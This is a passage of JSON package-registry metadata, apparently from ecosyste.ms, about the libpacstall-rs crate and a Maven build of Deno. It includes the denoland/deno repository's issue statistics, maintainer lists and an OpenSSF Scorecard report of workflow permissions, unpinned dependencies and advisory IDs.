.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T10:02:25.307Z","dependent_packages_count":0,"downloads":310,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":92.09699146834306,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.026575515702464195,"forks_count":0.08980691513246519,"average":31.068793929785652},"purl":"pkg:cargo/libpacstall-rs","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/libpacstall-rs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/libpacstall-rs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/libpacstall-rs/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/libpacstall-rs/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:50.711Z","updated_at":"2023-01-11T08:26:50.711Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12401476,"name":"org.mvnpm.at.deno:win32-arm64","ecosystem":"maven","description":"win32-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":17,"first_release_published_at":"2025-10-20T11:32:28.000Z","latest_release_published_at":"2026-08-08T02:21:24.000Z","latest_release_number":"2.9.5","last_synced_at":"2026-08-28T22:03:55.169Z","created_at":"2025-10-20T11:46:21.387Z","updated_at":"2026-08-28T22:03:55.170Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/win32-arm64/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/win32-arm64/","metadata":{"repositories":["https://repo.maven.apache.org/maven2"]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / 